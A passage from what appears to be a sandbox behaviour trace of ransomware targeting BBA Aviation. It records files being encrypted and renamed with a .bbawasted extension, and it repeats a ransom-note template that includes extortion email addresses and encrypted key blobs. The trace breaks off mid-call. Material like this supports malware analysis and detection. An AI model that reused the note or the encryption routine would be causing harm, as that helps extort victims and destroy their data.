[0159.768] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 39 [0159.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0159.768] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.768] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0159.768] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0159.769] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.769] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0159.783] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.784] SetEndOfFile (hFile=0x28c) returned 1 [0159.785] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.785] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.bbawasted")) returned 1 [0159.786] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0159.786] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0159.786] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xd5b [0159.786] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd5b) returned 0x650000 [0159.786] CloseHandle (hObject=0x294) returned 1 [0159.805] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0159.805] CloseHandle (hObject=0x290) returned 1 [0159.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0159.805] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0159.806] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0159.806] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.806] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0159.806] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0159.806] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0159.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.818] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gUjTcx6cYYKFwKLs0nnfPK1uRM7BbXwTvpU3k+YU1TwdmAIsV1VAAkuTk5TmZY0z\r\nrF6E/4KZXH2xR57Itmx7iwahdD7ru9Tu6rVxYdR18pKAaUeI2BtKw26UO4XxcS9R\r\nLvjyhJelrJDyN1wpswgSoQubx38v8pbg+uNeTIw7CkE+oM75pEJ+72rBnVvU+2DI\r\nFYJfcD75LIWf5l4FXRx8Ib2XZtn3YhNch2wnfcJq77fVdMgBkwtRPQLeW9oNn/Ni\r\nByxLnVErtZDU95yGDC9AH1KFmDVt6iy37psN6xhfC3mbL9ueqwA+VXQzeXBWxCJF\r\nm8eMJZODKZw7ms3M9esiJT53SVWfo8l7bzYH3dnxDnceuwlk936xRxWCKN6XqajH\r\nKHGhysalGbjOHHqApDI4YYOU+vFVqMZvvcnYRPMs0C8+0le2MmnRiepauUqd7ipW\r\nXvGAffgW8uAhpWfMr/+MYGLfWsXR9RLlVxo4oZ6uNh2dnt3oL1xSwa7Oti+0Ucse\r\nGQvXT3GYLtk65Zvo8AS6KuQn+/hmbB9BreiS0nNbQE/ViPPJbSmGYbp7QfrWhY7t\r\nZ5xhCWObtxH4boJR2QYgSKdmnQx+ko+8v8h/tONyuwm/TkrPQpwEnECFX6boW35p\r\nAlCF8aybuCprC3+1jT5L6k3aILp073v2HkL1FLqj25u=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.818] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0159.818] SetEndOfFile (hFile=0x28c) returned 1 [0159.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.821] CloseHandle (hObject=0x28c) returned 1 [0159.823] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.823] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a05b8 | out: hHeap=0x660000) returned 1 [0159.823] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0159.824] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0159.824] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0159.824] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 39 [0159.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0159.824] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.824] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.824] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0159.825] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0159.825] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.825] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0159.878] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0159.880] SetEndOfFile (hFile=0x28c) returned 1 [0159.880] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.880] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.880] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0159.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.bbawasted")) returned 1 [0159.882] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0159.882] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0159.882] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x22ac [0159.882] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22ac) returned 0x650000 [0159.882] CloseHandle (hObject=0x290) returned 1 [0159.897] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0159.898] CloseHandle (hObject=0x294) returned 1 [0159.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0159.898] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0159.899] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0159.899] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.899] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0159.899] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0159.899] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0159.910] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0159.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.910] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]sltZAY1lh9QxqCXNaZQN/isGF55SlP/ea3ZQEs2uFXAYzRQyc5wqgQVYMAW1zUu6\r\nZDxsNxzYSlheH39iDsqqSebpQikwse4FRaqUJj91PfVgkoV4aIb90oz2ef57qi9Z\r\nckqjq/gStVAyWsjwH/vor7q3nRM2NSIa2cfoG94J3wYm+PJ3a0TXybnMydDe2Cnt\r\nWaRGLCQAkBxcijAZj/jrm9ZJmjfbVOdUWFkw+lncVq5k3nSSY4htOD2myPhJs3DT\r\ncfNBucRNFs3AiOYNtcMiKcI8mclY8IL2qHR0JVH6y5EYil7iLRZjFhbiASAtLeRQ\r\nvfagLJb0chRBftypEbNJa/i/3IFbjl21PrNSQAEEWbci2/NHTzgAWuPr7tujIIjJ\r\nBp4eAwLV/nmuGG0BXIa+KPLeJ5ev0TnsHqmz9IYrMlsX0hbnac/qAMccMKICpdTo\r\naVBTzYZgNSfyZEN/PTttHV7iclmzgfeV2XXgbn6Xc0deSmIXXXB5BhM4nCRC/zmc\r\nAbps/LJtyN00FeePhg1fKfKrTLeDXYSRhLmqBfFVJvMAKIsPLNam0B6xf/TwuLaC\r\n5PWcYJbp2jeoXpiJ+GeyOS7ymDvGTojNXZTF1smW0UATAm+L/12/GGh6RDS9rIs6\r\nGwouzB+Acsu6O1DYCM+FdjGCfW/Lm0uBcBOLmNaGjSu=[end_key]\r\nKEEP IT\r\n") returned 984 [0159.910] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0159.910] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0159.911] SetEndOfFile (hFile=0x28c) returned 1 [0159.914] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0159.914] CloseHandle (hObject=0x28c) returned 1 [0159.925] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0159.925] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0159.926] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a0928) returned 1 [0159.960] CryptGenRandom (in: hProv=0x6a0928, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0159.960] CryptReleaseContext (hProv=0x6a0928, dwFlags=0x0) returned 1 [0159.960] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 39 [0159.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0159.960] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0159.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0159.960] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0159.961] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0159.961] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0159.961] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0160.002] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.003] SetEndOfFile (hFile=0x288) returned 1 [0160.006] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.006] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.bbawasted")) returned 1 [0160.011] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0160.011] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0160.011] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xc74 [0160.011] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc74) returned 0x650000 [0160.011] CloseHandle (hObject=0x280) returned 1 [0160.046] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0160.047] CloseHandle (hObject=0x290) returned 1 [0160.047] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.047] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0160.048] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.048] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.048] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0160.048] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0160.048] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b5190 [0160.060] _snwprintf (in: _Dest=0x6b5190, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]YZN6Fvng94p6fw71l9Lj18XdmqvmhUOdOaqNx2BFuLPpnPG30moe4FwPSRzA58N/\r\n+tAhxb8HAVYzds9AyC2NCk9HRj1L0OblKPdsPigZ05ex1XbfYup3tQjU7gycZmDO\r\nJRIQpT0Q2vUCIU1BTf+f88St3M5HbZM/WRCqBBmwJQDtOIOgr+LTIgzmTxN2AtHT\r\niaiyYK/Zn2NSE2KpyknE+KCvl0svnMmYT25VvIYA7NtHjOgT7rP6nLaJKC7BImfX\r\nIMUgNZqKqgBQQMTmm+End1ssOva1kYOu2zsw5ZjkBifSmfbuixhU7f4XrWSkJIvu\r\nSbKE8qoFNYjXTsHDqYeJzmrNoarg9E6XwMeM6ZY87xsgENgMPkA0hf3mdtSR8p3v\r\ndXtuU4b9Gbp8Qnx5AShFpZBjo7N7xlhmNOxrfGEEt6iLlQnjJZhysD5vKQymy0Gb\r\n2AN5qNTTMMa1dtjNloWB1n8WQ/wFsC8QiwpNyqCfJ2Pjbo27NbdsUI7uRFDu7rGG\r\nYogeM1CLtBHxH5wqPYQ0imqeRYsClo9Pexjjek8+vC9weW0+Hq4z2YX3G6b4oTl2\r\nG+z3cxznBqHbpW/PII5MImwhOZUEGxSMdyuDnFlNzI92njERWCfwB0PVT/vZHBep\r\n4Ru23ReAnXQTSLnzwxsOSFazX48noe9k93bafZhNg9h=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.060] WriteFile (in: hFile=0x288, lpBuffer=0x6b5190*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b5190*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0160.060] SetEndOfFile (hFile=0x288) returned 1 [0160.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b5190 | out: hHeap=0x660000) returned 1 [0160.063] CloseHandle (hObject=0x288) returned 1 [0160.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0160.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0a90 | out: hHeap=0x660000) returned 1 [0160.091] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0160.092] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0160.092] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.092] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 48 [0160.092] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6a0928 [0160.093] lstrcpyW (in: lpString1=0x6a0988, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.093] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.093] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x66c898) returned 1 [0160.093] CryptGenRandom (in: hProv=0x66c898, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0160.093] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.093] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0160.204] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.206] SetEndOfFile (hFile=0x28c) returned 1 [0160.206] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.206] lstrcpyW (in: lpString1=0x6a0988, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.bbawasted")) returned 1 [0160.218] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0160.218] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0160.218] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x12cde [0160.218] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12cde) returned 0x630000 [0160.218] CloseHandle (hObject=0x290) returned 1 [0160.248] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0160.249] CloseHandle (hObject=0x280) returned 1 [0160.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.249] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, 